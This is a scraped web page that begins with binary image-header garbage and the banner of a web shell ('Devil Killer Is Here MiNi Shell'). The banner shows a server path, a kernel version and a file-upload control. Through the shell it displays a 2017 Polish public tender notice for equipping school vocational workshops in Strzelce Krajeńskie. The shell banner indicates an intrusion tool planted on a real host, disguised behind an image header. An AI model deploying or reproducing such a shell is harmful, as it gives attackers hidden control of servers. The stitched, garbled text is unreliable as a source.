JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170310/41240-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.wrota.lubuskie.pl/pzea/' target='_blank'>http://bip.wrota.lubuskie.pl/pzea/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 41240 - 2017
              z dnia 2017-03-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Strzelce Krajeńskie: Doposażenie pracowni kształcenia zawodowego (warsztaty szkolne, pracownia rysunku technicznego) w Zespole Szkół Centrum Kształcenia Ustawicznego w Strzelcach Krajeńskich<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Modernizacja kształcenia zawodowego w Powiecie Strzelecko-Drezdeneckim</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Zespół Ekonomiczno-Administracyjny w Strzelcach Krajeńskich, krajowy numer identyfikacyjny
              8104493900000, ul.
              ul. Ks. St. Wyszyńskiego 
              7,
              66500  
              Strzelce Krajeńskie, woj.
              lubuskie, państwo
              Polska, tel.
              95 78 36 678, e-mail
              edukacja@fsd.pl, faks
              95 78 36 679.
              <br />
              Adres strony internetowej (URL): http://bip.wrota.lubuskie.pl/pzea/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.wrota.lubuskie.pl/pzea/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />ul. Ks. St. Wyszyńskiego 7, 66-500 Strzelce Krajeńskie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Doposażenie pracowni kształcenia zawodowego (warsztaty szkolne, pracownia rysunku technicznego) w Zespole Szkół Centrum Kształcenia Ustawicznego w Strzelcach Krajeńskich<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />5<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  nie
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. 2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości; 3. Dokument, o którym mowa w pkt 2, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Pkt 3 stosuje się. 5. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii. 2. Dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, chyba, że zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2014 poz. 1114 oraz z 2016 poz. 352), a wykonawca wskazał to wraz ze złożeniem oferty. 3. Zobowiązanie - Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (jeżeli dotyczy). 4. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany treści Umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie Strony, pod rygorem nieważności w zakresie:
1) zmiany terminu wykonania Umowy (skrócenie/wydłużenie) lub terminów płatności z uwagi na wstrzymanie/przerwanie wykonania przedmiotu Umowy z przyczyn zależnych od Zamawiającego lub niezależnych od Wykonawcy;
2) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy - w zakresie dostosowania postanowień Umowy do zmiany przepisów prawa;
3) wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z Umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania Umowy do tych zmian;
4) zmniejszenia zakresu realizacji Przedmiotu Umowy, w przypadku wystąpienia zmiany okoliczności powodującej, że:
a) realizacja części Przedmiotu Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania Umowy,
b) realizacja części Przedmiotu Umowy nie jest możliwa, z przyczyn nieleżących po  stronie Zamawiającego i Wykonawcy, przy odpowiednim zmniejszeniu wynagrodzenia należnego Wykonawcy.
